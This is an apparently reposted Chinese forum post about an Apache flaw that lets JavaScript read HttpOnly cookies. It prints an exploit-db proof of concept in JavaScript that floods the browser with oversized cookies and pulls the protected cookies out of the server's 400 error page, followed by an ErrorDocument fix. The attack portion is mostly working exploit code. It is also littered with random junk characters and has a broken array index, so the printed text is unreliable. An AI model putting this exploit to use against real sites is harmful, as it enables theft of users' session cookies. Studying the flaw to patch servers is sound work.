Apache HttpOnly Cookie XSS跨站漏洞

admin

很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题，一般都采用给cookie加上httponly的属性，来禁止直接使用js得到用户的cookie，从而降低xss的危害，而这个问题刚好可以用来绕过cookie的这个httponly的属性。
) C/ o( \; @6 C2 A* z5 z7 b7 r2 b
  j# Q; C. I' q1 h用chrome打开一个站点，F12打开开发者工具，找到console输入如下代码并回车:
0 B) |" l2 q; d4 }! i
  ?& `6 z  a* F: z- H
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
// Construct string for cookie value
2 f3 E7 a+ a4 }var str = "";
for (var i=0; i< 819; i++) {
+ Q2 o' a$ L5 g( p+ Mstr += "x";
}
; p  l' C& C' y( i6 m* R// Set cookies
1 C2 Y9 @  _$ n8 i! \+ ~& Sfor (i = 0; i < 10; i++) {
// Expire evil cookie
* d. n! L. T! E" A) \) [if (good) {
. o4 n7 v) O9 _) B" gvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
}
// Set evil cookie
else {
6 [' Z# e# c8 g! @- e. ~2 Pvar cookie = "xss"+i+"="+str+";path=/";
* I( T; u2 l9 }1 ^1 u: P1 h}
document.cookie = cookie;
: q4 S% C1 [' l4 m5 {$ @( Z& J}
5 q& h1 l2 W" o% Z2 T}
, l$ P3 |& x( I- H" a( q- ?function makeRequest() {
setCookies();
function parseCookies () {
. `$ U% a" d! Z* Q6 x1 z7 I" Rvar cookie_dict = {};
9 @5 f" o# r* f' i# r. e, b// Only react on 400 status
) w7 t0 R7 a0 o9 A- bif (xhr.readyState === 4 && xhr.status === 400) {
0 l" y+ P* C9 F// Replace newlines and match <pre> content
/ n4 w2 |, i/ o7 M- hvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
if (content.length) {
  p" Z1 M2 A! f5 i  t// Remove Cookie: prefix
content = content[1].replace("Cookie: ", "");
  _( z/ ^- {+ mvar cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
' _% V) U4 O1 o: H) z, b/ |5 E, E// Add cookies to object
3 z; m! e/ S% wfor (var i=0; i<cookies.length; i++) {
! U& G4 I& y1 O" z8 ~var s_c = cookies.split('=',2);
cookie_dict[s_c[0]] = s_c[1];
}
& G) A% z( A& H) A}
* y/ Y. ~0 x( l2 r// Unset malicious cookies
setCookies(true);
alert(JSON.stringify(cookie_dict));
8 n% j. H) p, C}
}
// Make XHR request
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("GET", "/", true);
xhr.send(null);
}
makeRequest();
2 g. S9 |9 w0 Q' [3 j& e3 S
2 A( p& Y5 A# k2 n9 f. ]  Z* h你就能看见华丽丽的400错误包含着cookie信息。
7 u; o- P2 @5 w2 V" C
1 i8 k! ~- \9 ]5 C3 \下载地址：https://gist.github.com/pilate/1955a1c28324d4724b7b/download#
8 |" U- x' i' X$ e8 d( X
修复方案：

7 _- U& `1 N' n: `+ |2 k: VApache官方提供4种错误处理方式（http://httpd.apache.org/docs/2.0/mod/core.html#errordocument），如下
8 t7 d( f: ^( y7 O
In the event of a problem or error, Apachecan be configured to do one of four things,

( P7 t1 a. f* v6 D1. output asimple hardcoded error message输出一个简单生硬的错误代码信息
# y3 s) _, r$ m6 S" n2. output acustomized message输出一段信息
" R' \& O2 C7 Q4 j0 x8 h2 |3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
. W  @1 c0 @3 q* i, r4. redirect to an external URL to handle theproblem/error转向一个外部URL

9 R. G& l; I' Z8 B' K经测试，对于400错误只有方法2有效，返回包不会再包含cookie内容
! ~$ ~& _& ]0 f( N3 q
Apache配置：
( ^) F8 I1 v- w7 e' C9 V
& Q$ h( l" @8 d" nErrorDocument400 " security test"

. E0 {2 t8 F8 Y7 K; [( \' p当然，升级apache到最新也可：）。
) h0 z9 N. u) V( v3 S5 y
参考：http://httpd.apache.org/security/vulnerabilities_22.html